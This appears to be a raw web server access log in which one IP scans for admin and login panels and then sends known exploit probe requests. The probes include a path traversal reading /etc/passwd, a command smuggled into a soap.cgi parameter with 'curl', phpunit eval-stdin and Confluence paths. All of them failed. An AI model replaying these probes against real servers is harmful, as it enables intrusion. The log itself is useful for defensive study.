195.164.49.69 - - [18/Nov/2024:22:42:23 +0000] GET /resources/autogenerated/product-info.json HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:22:42:25 +0000] GET /bonita/login.jsp HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:42:27 +0000] GET /oauth2/authorize HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:42:29 +0000] GET /mysql.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:42:31 +0000] GET /graph/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:42:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:42:36 +0000] GET /users/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:42:39 +0000] GET /cgi-bin/qmailadmin/qmailadmin HTTP/1.1 404 1111
83.212.98.101 - - [18/Nov/2024:22:42:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:42:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:42:43 +0000] GET /admin/login_uid.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:42:44 +0000] GET /dashboard/ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:42:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:42:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:42:51 +0000] GET /nagvis/frontend/nagvis-js/index.php HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:22:42:52 +0000] GET /glpi/ HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:42:55 +0000] GET /m_login.htm HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:42:57 +0000] GET /radiusmanager/user.php HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:42:58 +0000] GET /console/index.html HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:43:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:03 +0000] GET /wfc/ HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:43:05 +0000] GET /vnc.html HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:43:07 +0000] GET /login_up.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:43:09 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:11 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:13 +0000] GET /status.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:43:15 +0000] GET /QSA/Login.aspx HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:43:17 +0000] GET /login.cgi?uri=/ HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:43:18 +0000] GET /sql.php HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:43:20 +0000] GET /CACHE/sdesktop/install/start.htm HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:22:43:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:25 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:43:28 +0000] GET /cgi-bin/qmailadmin HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:43:29 +0000] GET /cacti/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:43:32 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:34 +0000] GET /juddi/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:43:35 +0000] GET /kiali/api/status HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:43:38 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:43:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:42 +0000] GET /login/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:43:44 +0000] GET /login?redir=/ng HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:43:46 +0000] GET /user.php HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:43:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:50 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:43:56 +0000] GET /sqlbuddy/ HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:43:57 +0000] GET /RDWeb/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:44:00 +0000] GET /ProtectManager/Logon HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:44:02 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:44:04 +0000] GET /API/External/GetPrivacy HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:44:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:44:08 +0000] GET /wp-content/plugins/adminer/adminer.php HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:22:44:11 +0000] GET /+CSCOE+/logon.html HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:44:12 +0000] GET /teampass HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:44:15 +0000] GET /ssf/s/portalLogin HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:44:17 +0000] GET /cgi-ssl/qmailadmin/qmailadmin HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:44:19 +0000] GET /login/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:44:21 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:44:24 +0000] GET /kiali/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:44:26 +0000] GET /zenario/admin/welcome.php HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:44:27 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:44:30 +0000] GET /identification.php HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:44:31 +0000] GET /login/pre_login_agreement HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:44:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:44:35 +0000] GET /accounts/login/?next=/ HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:44:37 +0000] GET /phpldapadmin HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:44:38 +0000] GET /EWS/Exchange.asmx HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:44:41 +0000] GET /em/console/logon/logon HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:22:44:43 +0000] GET /Manager/ HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:44:45 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:44:47 +0000] GET /versa/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:44:49 +0000] GET /carbon/admin/login.jsp HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:44:51 +0000] GET /decisioncenter/login HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:44:53 +0000] GET /jw/web/; HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:44:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:44:57 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:44:59 +0000] GET /downloader/ HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:45:01 +0000] GET /cgi-bin/luci HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:45:03 +0000] GET /Default.aspx?pid=Login HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:45:05 +0000] GET /ocpu/ HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:45:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:45:09 +0000] GET /static/img/icons/favicon-32x32.png HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:22:45:11 +0000] GET /SphinxAuth/Account/Login HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:45:15 +0000] GET /webalizer/ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:45:15 +0000] GET /m/ HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:45:17 +0000] GET /api/xml HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:45:19 +0000] GET /weblogin.htm HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:45:21 +0000] GET /htdocs/index.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:45:22 +0000] GET /owa/service.svc HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:45:25 +0000] GET /user.php?mod=login HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:45:27 +0000] GET /modules/sfkdbmanage/adminer.php HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:45:29 +0000] GET /dashboard/auth/login HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:45:35 +0000] GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:45:37 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:45:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:45:40 +0000] GET /photo/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:45:42 +0000] GET /solr/ HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:45:44 +0000] GET /maximo/webclient/login/login.jsp?appservauth=true HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:22:45:46 +0000] GET /laravel-filemanager?type=Files HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:45:48 +0000] GET /Connect.do HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:45:50 +0000] GET /dashboard HTTP/1.1 404 1083
83.212.98.101 - - [18/Nov/2024:22:45:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:45:52 +0000] GET /sslvpn_logon.shtml HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:45:56 +0000] GET /h2-console/login.jsp HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:45:58 +0000] GET /download/inc/config.inc.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:45:59 +0000] GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1 404 1159
195.164.49.69 - - [18/Nov/2024:22:46:01 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:46:03 +0000] GET /auth-sign-in?appUri=%2F HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:46:05 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:46:07 +0000] GET /auth HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:46:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:46:10 +0000] GET /users/auth/saml/metadata HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:22:46:11 +0000] GET /v2/keys/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:46:12 +0000] GET /concerto/Login?goto=Central HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:46:17 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:46:19 +0000] GET /docs HTTP/1.1 302 -
195.164.49.69 - - [18/Nov/2024:22:46:19 +0000] GET //example.com/ HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:46:20 +0000] GET /.example.com HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:46:20 +0000] GET /example.com/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:46:20 +0000] GET /example.com HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:46:20 +0000] GET //%5C%5Cexample.com/%252e%252e%252f HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:46:20 +0000] GET //http%3A%2F%2Fexample.com HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:46:29 +0000] GET /mailscanner/login.php HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:46:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:46:35 +0000] GET /portal/webclient/index.html HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:46:37 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:46:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:46:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:46:43 +0000] GET /minio/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:46:45 +0000] GET /javaScript/responsive/portal.js HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:46:47 +0000] GET /login_up.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:46:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:46:53 +0000] GET /cgi-bin/luci/ HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:46:55 +0000] GET /inc_config.inc.php._txt HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:46:55 +0000] GET /login/?next=/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:46:57 +0000] GET /ghost/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:46:59 +0000] GET /mifs/login.jsp HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:47:01 +0000] GET /http/index.html HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:47:03 +0000] GET /versa/login.html HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:47:05 +0000] GET /webmin/ HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:47:09 +0000] GET /aims/ps/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:47:11 +0000] GET /user HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:47:13 +0000] GET /servicedesk/customer/user/login HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:22:47:14 +0000] GET /redoc HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:47:15 +0000] GET /panel HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:47:17 +0000] GET /dbconsole/ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:47:19 +0000] GET /appsuite/ HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:47:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:47:24 +0000] GET /era/webconsole/ HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:47:26 +0000] GET /auth/login HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:47:28 +0000] GET /nps/servlet/portalservice HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:47:30 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:47:32 +0000] GET /Login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:47:34 +0000] GET /logon/LogonPoint/tmindex.html HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:47:36 +0000] GET /pwdform.htm HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:47:39 +0000] GET /login.do HTTP/1.1 404 1082
83.212.98.101 - - [18/Nov/2024:22:47:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:47:42 +0000] GET /auth.html HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:47:44 +0000] GET /download/inc/tables.inc.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:47:44 +0000] GET /admin/login/?next=/admin/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:47:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:47:48 +0000] GET /mifs/user/login.jsp HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:47:50 +0000] GET /_dashboards/app/login HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:47:52 +0000] GET /workflow/jsp/logon.jsp HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:47:54 +0000] GET /explore HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:47:58 +0000] GET /app/template/Login.vm HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:48:00 +0000] GET /lui/ HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:48:02 +0000] GET /servicedesk/customer/portal/10/user/login HTTP/1.1 404 1135
195.164.49.69 - - [18/Nov/2024:22:48:04 +0000] GET /openapi.json HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:48:04 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:48:06 +0000] GET /h2-console/ HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:48:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:48:10 +0000] GET /archibus/login.axvw HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:48:12 +0000] GET /dashboard/ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:48:14 +0000] GET /auth/manager/sign-in/ HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:48:16 +0000] GET /nds HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:22:48:18 +0000] GET /web/database/manager HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:48:20 +0000] GET /ServiceCenter/Login.aspx HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:48:22 +0000] GET /login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:48:24 +0000] GET /dashboard/auth/login/ HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:48:26 +0000] GET /mifs/c/d/android.html HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:48:28 +0000] GET /api/v4/projects HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:48:30 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:48:32 +0000] GET /archibus/schema/ab-core/views/sign-in/ab-sign-in.jsp HTTP/1.1 404 1146
195.164.49.69 - - [18/Nov/2024:22:48:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:48:36 +0000] GET /_LOGIN_SERVER_ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:48:40 +0000] GET /horizon/auth/login/?next=/horizon/ HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:48:42 +0000] GET /auth/login/?next=/ HTTP/1.1 404 1093
83.212.98.101 - - [18/Nov/2024:22:50:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:22:52:40 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:52:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:53:11 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:53:36 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:53:37 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:22:53:38 +0000] PUT /2p2i914pe8zxAM1ptrExHkF02m7.jsp/ HTTP/1.1 405 1050
- - - [18/Nov/2024:22:53:39 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:53:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:53:43 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:53:45 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [18/Nov/2024:22:53:46 +0000] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1148
195.164.49.69 - - [18/Nov/2024:22:53:46 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:53:47 +0000] POST /_search?pretty HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:53:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:53:49 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:53:52 +0000] PUT /fileserver/2p2i92i9WoWDlx3jexZtl03A3wG.txt HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:22:53:53 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:53:53 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:53:56 +0000] POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1 404 1149
195.164.49.69 - - [18/Nov/2024:22:53:57 +0000] POST /soap.cgi?service=whatever-control;curl HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:53:59 +0000] POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:53:59 +0000] POST /password_change.cgi HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:54:01 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:54:02 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:22:54:03 +0000] GET /2p2i914pe8zxAM1ptrExHkF02m7.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:54:04 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:54:05 +0000] GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:22:54:06 +0000] GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:54:07 +0000] GET /fileserver/2p2i92i9WoWDlx3jexZtl03A3wG.txt HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:22:54:09 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:54:10 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:22:54:11 +0000] POST /node/1?_format=hal_json HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:54:12 +0000] POST /service/extdirect HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:54:13 +0000] POST /cgi-bin/supportInstaller HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:54:15 +0000] POST /api/timelion/run HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:54:16 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:54:17 +0000] POST /service/rapture/session HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:54:18 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:54:19 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:54:22 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:54:22 +0000] GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1160
195.164.49.69 - - [18/Nov/2024:22:54:23 +0000] GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:54:27 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:54:28 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:54:31 +0000] GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:54:32 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:22:54:33 +0000] POST /EemAdminService/EemAdmin HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:54:34 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:54:34 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:54:36 +0000] POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:54:37 +0000] POST /cgi-bin/mainfunction.cgi HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:54:40 +0000] POST /service/rest/beta/repositories/bower/group HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:22:54:41 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:54:42 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:54:43 +0000] GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1162
195.164.49.69 - - [18/Nov/2024:22:54:45 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:54:46 +0000] POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 404 1218
195.164.49.69 - - [18/Nov/2024:22:54:48 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:54:50 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:22:54:53 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
